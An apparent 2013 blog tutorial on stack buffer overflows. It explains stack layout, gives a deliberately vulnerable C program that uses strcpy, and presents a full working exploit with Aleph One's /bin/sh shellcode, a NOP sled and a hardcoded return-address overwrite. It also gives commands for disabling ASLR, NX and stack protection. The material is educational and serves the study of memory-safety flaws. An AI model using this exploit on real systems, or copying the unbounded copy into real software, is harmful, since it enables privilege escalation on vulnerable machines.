
May 22, 2013

Stack-buffer Overflow Vulnerability

We read about a great deal of malware causing havoc on today's computers. How does it get onto a computer in the first place? Memory vulnerabilities are one of the main ways in which malware exploits a target computer.

The goal of any malware writer is to get his malicious code executed on the victim's computer. There are two ways to go about this. One way is to make the user himself run the malicious executable, for example through a phishing email that asks the user to open a malicious attachment. However, the malicious code often has to run with elevated privileges, such as those of an admin account, before it can perform its evil deeds. So the second way is to inject the code into a running process that already has admin privileges and cause the CPU to execute the injected code while the victim process is running. The malicious code then runs with admin privileges too. This requires the victim process to take some user input through which the malicious code can be injected.

For this to work properly, there are two phases: Code Injection and Instruction Pointer hijacking. Code Injection is when the malicious code (the shell code) is inserted into the victim process's memory by supplying it as user input that the process does not filter. Instruction Pointer hijacking is the process of making the instruction pointer register (EIP) point to the injected code. IP hijacking is also called Control Flow hijacking because the program's control flow is redirected to the injected code.

Code Injection is pretty straightforward because many programs take input from the user without filtering it for malicious content. The program takes the input and places it somewhere in memory, on the stack or the heap. From here on, the task of the malware writer is to make sure the CPU executes this injected code at some later point, by modifying the contents of the EIP register.

To understand how EIP can be modified, we first need to understand the memory layout of a process. There are 4 basic sections in a process's memory: text, data, heap and stack. On most systems the stack grows down, i.e., with two nested function calls, function1's frame will be at a higher address than function2's frame, e.g., 0xff88 vs. 0xff18. This doesn't mean that an array allocated on the stack also grows downwards! For example, a 20-byte array whose base address is 0xff20 has its last byte at 0xff33 (0xff20 + 19), NOT at some address below 0xff20. A very good article about process memory layout is "Anatomy of a program in memory".

So basically, when a function is called, the return address is stored on the stack by the caller's call instruction. When the callee returns, the saved address is popped off the stack into the EIP, so the CPU continues executing inside the caller. If we can modify this saved return address, we are indirectly controlling the EIP.
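The array arithmetic above is easy to get wrong by one, so here is a minimal sketch of it. The function names are mine, purely for illustration; the second function just confirms on a real stack array that elements sit at ascending addresses.

```c
#include <stddef.h>
#include <stdint.h>

/* Address of the last byte of an array: base + size - 1.
 * Array elements occupy ascending addresses no matter which
 * way the stack itself grows. */
uintptr_t last_byte_address(uintptr_t base, size_t size_in_bytes)
{
    return base + size_in_bytes - 1;
}

/* Returns 1 if the last element of a real stack array is at a
 * higher address than its first element. */
int stack_array_ascends(void)
{
    char buf[20];
    buf[0] = 0;
    return &buf[19] > &buf[0];
}
```

For the example in the text, last_byte_address(0xff20, 20) gives 0xff33.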

--[ Stack Buffer Overflow ]--
This is the most basic vulnerability to understand and exploit. What is surprising is that this attack has been publicly known since at least the Morris worm of 1988, was popularized by Aleph One's 1996 article "Smashing the Stack for Fun and Profit", and is still being used in exploits. A simple Google search will turn up many recent attacks. I will use the following program to explain the vulnerability.

// stack_vuln.exe
#include <stdio.h>
#include <string.h>

void foo(char *user_str)
{
    char local_str[64];
    strcpy(local_str, user_str);  // no bounds check: this is the vulnerability
}

int main(int argc, char *argv[])
{
    if(argc!=2) 
    { printf("usage: %s <in_string>\n", argv[0]); return 1; }
    foo(argv[1]);
    return 0;
}

User input is supplied via command line arguments and is passed to the function foo() by main(). foo() has a local char array of size 64, i.e., allocated on the stack. It simply copies the contents of the formal parameter user_str to the local char array using strcpy(). Remember that strcpy() is very unsafe to use because it performs no bounds checking, so it is very easy to write past the end of the destination buffer. This is the vulnerability being exploited here. Consider the stack when control is inside foo(), just before executing the call instruction to strcpy(): local_str sits at the lowest addresses of the frame, followed by the saved EBP and then the saved return address ret_addr.
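One way to picture that frame is as a C struct, lowest address first. This is only a model under my own assumptions (32-bit x86, no padding and no stack canary between the fields). The struct and function names are hypothetical, and a real compiler is free to lay the frame out differently.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical model of foo()'s stack frame, lowest address first.
 * Assumes 32-bit x86 with no padding or canary between the fields. */
struct foo_frame {
    char     local_str[64]; /* the vulnerable buffer           */
    uint32_t saved_ebp;     /* caller's frame pointer (sfp)    */
    uint32_t ret_addr;      /* saved EIP (sip), popped by ret  */
};

/* Offset from the start of local_str at which the saved EIP begins. */
size_t ret_addr_offset(void)
{
    return offsetof(struct foo_frame, ret_addr);
}
```

In this model the saved EBP starts at offset 64 and the saved EIP at offset 68, which is where the "64+4+4" in the exploit code further down comes from.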

When strcpy() is passed the address of local_str as destination buffer, it copies the contents of user_str to local_str until a '\0' is encountered. Now, if the source buffer contains a '\0' within the first 64 bytes, everything is fine. But if the length of the source buffer is 72 bytes, it overflows the destination buffer and overwrites the saved EBP and ret_addr. When foo() executes the return instruction, ret_addr is popped off the stack and into the EIP. So if the value of ret_addr can be modified, EIP can thus be controlled.
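To watch this happen without actually smashing a stack, here is a small memory-safe simulation. It copies the input into a 72-byte array that stands in for foo()'s frame, the way strcpy() would, and reports what the saved return address ends up as. The function name and the frame model (buffer, then saved EBP, then return address, with no padding) are my assumptions.

```c
#include <stdint.h>
#include <string.h>

#define BUF_SIZE   64             /* size of local_str                  */
#define FRAME_SIZE (BUF_SIZE + 8) /* plus saved EBP and return address  */

/* Copies input (including its '\0', as strcpy() does) into a model of
 * foo()'s frame, clamped to the model's 72 bytes so this sketch never
 * writes out of bounds. Returns the resulting saved return address. */
uint32_t simulate_strcpy_into_frame(const char *input, uint32_t original_ret)
{
    unsigned char frame[FRAME_SIZE];
    size_t n = strlen(input) + 1;
    uint32_t ret = 0;
    size_t i;

    memset(frame, 0, sizeof frame);
    /* Store the legitimate return address, little-endian as on x86. */
    for (i = 0; i < 4; ++i)
        frame[BUF_SIZE + 4 + i] = (unsigned char)(original_ret >> (8 * i));

    if (n > FRAME_SIZE)
        n = FRAME_SIZE;          /* the model ends after the return address */
    memcpy(frame, input, n);     /* bytes 64..71 land on EBP and ret_addr   */

    /* Read the return address back, again little-endian. */
    for (i = 0; i < 4; ++i)
        ret |= (uint32_t)frame[BUF_SIZE + 4 + i] << (8 * i);
    return ret;
}
```

A short input leaves the return address alone, while 72 'A' characters turn it into 0x41414141, the classic sign in a debugger that the saved EIP is under your control.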

So how is this exploitable? A classic exploit is to have the remote machine open up a shell for the attacker. We can use Aleph One's shell code as our payload. It takes up 46 bytes: 45 bytes of code and the "/bin/sh" string, plus one byte for the string terminator that the code writes at run time. The buffer overflow vulnerability is the attack vector, with the shell-obtaining code as the payload. We now have the shell code, but we must still come up with an exploit string to give as input to the vulnerable program. The exploit string should look like this:

/*
 *         ** Exploit string layout **
 *
 * 0 1 2 3 ... 21  |  22 23 ... 67  |  68 69 70 71
 *      NOPs          shell_code     sip overwrite addr
 *
 */

  • We have a 64 byte vulnerable buffer on the stack and we have to write 72 bytes so that the saved EIP is overwritten.
  • We have 72-46-4 = 22 bytes extra space in the exploit string. We will use this to hold NOPs (0x90 instruction) to be used as a landing area. Index 0-21 will hold NOPs.
  • We store the shell code just before the EIP overwrite address. Index 22-67 will hold the shell code.
  • The last 4 bytes will overwrite the saved EIP, so the exploit string's last 4 bytes must hold an address inside the NOP landing area (or the start of our shell code itself). This is calculated by determining the address of the vulnerable buffer on the stack by running stack_vuln.exe in a debugger.
  • This exploit string will be supplied as the first argument to stack_vuln.exe program.
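The index arithmetic in the list above can be written down as a small helper. This is just a sketch: the struct and function names are mine, and it assumes, as the article does, that the saved EBP and saved EIP (4 bytes each) come straight after the buffer.

```c
#include <stddef.h>

/* Offsets into the exploit string, assuming saved EBP and saved EIP
 * (4 bytes each) directly follow the vulnerable buffer. */
struct exploit_layout {
    size_t total_len;       /* bytes needed to cover the saved EIP      */
    size_t nop_count;       /* size of the NOP landing area             */
    size_t shellcode_start; /* index of the first shell code byte       */
    size_t ret_offset;      /* index where the overwrite address starts */
};

/* Caller must ensure shellcode_len <= buf_size + 4. */
struct exploit_layout compute_layout(size_t buf_size, size_t shellcode_len)
{
    struct exploit_layout l;
    l.total_len       = buf_size + 4 + 4;
    l.ret_offset      = l.total_len - 4;
    l.nop_count       = l.ret_offset - shellcode_len;
    l.shellcode_start = l.nop_count;
    return l;
}
```

With buf_size = 64 and shellcode_len = 46 this gives 22 NOPs, shell code starting at index 22, and the overwrite address at index 68, matching the layout diagram.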

An example exploit string construction may be as follows. Assume that the vulnerable local_str[] buffer starts at 0xbffffc28. We choose 0xbffffc2e as the target EIP address, which lies 6 bytes into the NOP area, and build the exploit string around it. Note how it lines up with the stack area: the saved EIP ret_addr gets overwritten by 0xbffffc2e.
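Two details of that address are worth checking by hand: the byte order in which it has to appear in the string (x86 is little-endian) and whether it really falls inside the NOPs. A minimal sketch of both follows. The helper names are mine.

```c
#include <stdint.h>

/* Writes a 32-bit address in little-endian byte order, which is how
 * x86 stores it in memory and so how it must appear in the string. */
void encode_le32(uint32_t addr, unsigned char out[4])
{
    out[0] = (unsigned char)(addr & 0xff);
    out[1] = (unsigned char)((addr >> 8) & 0xff);
    out[2] = (unsigned char)((addr >> 16) & 0xff);
    out[3] = (unsigned char)((addr >> 24) & 0xff);
}

/* Returns 1 if target lies in the NOP area [buf_addr, buf_addr + nop_count). */
int lands_in_nops(uint32_t buf_addr, uint32_t nop_count, uint32_t target)
{
    return target >= buf_addr && target - buf_addr < nop_count;
}
```

For 0xbffffc2e the last four bytes of the exploit string are 2e fc ff bf, and with the buffer at 0xbffffc28 and 22 NOPs the target is comfortably inside the landing area.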

We execute stack_vuln.exe using the execve() system call as follows:

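#include <stdio.h>
#include <string.h>
#include <unistd.h>

// Path to the vulnerable program (assumed here; adjust to your setup)
#define TARGET "./stack_vuln.exe"

// shellcode from Aleph One's article
static char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

char szExploit[64+4+4+1];  // 64 for buffer, 4 for sfp, 4 for sip, 1 for '\0'
unsigned int iBufAddr = 0xbffffc2e;  // lands inside the NOPs

int main()
{  
  char *args[3];
  char *env[1];
  size_t i, iSCStartIndex;

  args[0] = "stack_vuln.exe"; 
  args[1] = szExploit;
  args[2] = NULL;
  env[0] = NULL;

  // Fill with NOPs, keeping the final byte as the string terminator
  memset(szExploit, 0x90, sizeof(szExploit)-1);
  szExploit[sizeof(szExploit)-1] = '\0';

  // Copy the shell code (without its trailing '\0') to index 22 onwards
  iSCStartIndex = 22;
  for(i = 0; i < sizeof(shellcode)-1; ++i)
    szExploit[iSCStartIndex++] = shellcode[i];

  // Place jump-to-exploit address at the end of our exploit string
  // (memcpy avoids type-punning through an int pointer)
  memcpy(szExploit+68, &iBufAddr, 4);

  if (0 > execve(TARGET, args, env))
    fprintf(stderr, "execve failed.\n");

  return 0;
}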

So stack_vuln.exe is exec'd with our exploit string as argv[1], and strcpy() copies this string into the stack buffer local_str, overwriting the saved EIP. When the ret instruction in foo() is finally executed, it pops the overwritten value, 0xbffffc2e, into the EIP register, and the CPU starts executing from this address, which holds NOPs followed by the shell code. We now get a new shell opened up for us. If we need a root shell, the target executable must be owned by root and have the setuid bit set (not to be confused with the sticky bit) so that it runs with an effective user ID of root (0).
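Since setuid and sticky are easy to mix up, here is a small sketch of how one might check a target before bothering with it. The function names are mine. stat() and S_ISUID are standard POSIX.

```c
#include <sys/types.h>
#include <sys/stat.h>

/* Returns 1 if the permission bits include set-user-ID (octal 04000).
 * The sticky bit (octal 01000) is a different flag and does not count. */
int has_setuid_bit(mode_t mode)
{
    return (mode & S_ISUID) != 0;
}

/* Returns 1 if the file is owned by root and has the setuid bit set,
 * 0 if not, and -1 if stat() fails. */
int is_setuid_root(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return st.st_uid == 0 && has_setuid_bit(st.st_mode);
}
```

A mode of 04755 passes the check, while 01755 (sticky only) does not.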

Caveats:

  • The exploit string must not contain a NUL byte (value 0x00) because strcpy() and the other string functions stop copying at the first NUL byte.
  • The stack addresses differ slightly between running the target program under a debugger and running it by itself. I have seen a difference of 32 bytes, i.e., local_str was at an address 32 bytes lower on the stack when run in a debugger. So you must compensate for this in your exploit string.
  • Of course, modern operating systems and compilers come with protection against this attack: ASLR, NX bits and stack protection. These must be disabled if you want to try this out (the commands below are specific to Linux).
    • Disabling ASLR: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space (a plain "sudo echo 0 > file" fails because the redirection is done by your unprivileged shell, not by sudo)
    • Removing stack protection and NX: Compile with -fno-stack-protector -z execstack
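The first caveat is easy to check mechanically before launching anything. A minimal sketch, with a function name of my own choosing, that scans the payload bytes (everything before the final terminator) for a stray 0x00:

```c
#include <stddef.h>

/* Returns the index of the first 0x00 byte in buf[0..len), or -1 if
 * there is none. Run it over the exploit bytes, excluding the final
 * terminator, before handing the string to the target. */
long first_nul_index(const unsigned char *buf, size_t len)
{
    size_t i;
    for (i = 0; i < len; ++i)
        if (buf[i] == 0x00)
            return (long)i;
    return -1;
}
```

If the buffer address you found in the debugger happens to contain a zero byte, this catches it, and you would need to aim at a different address inside the NOP area.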
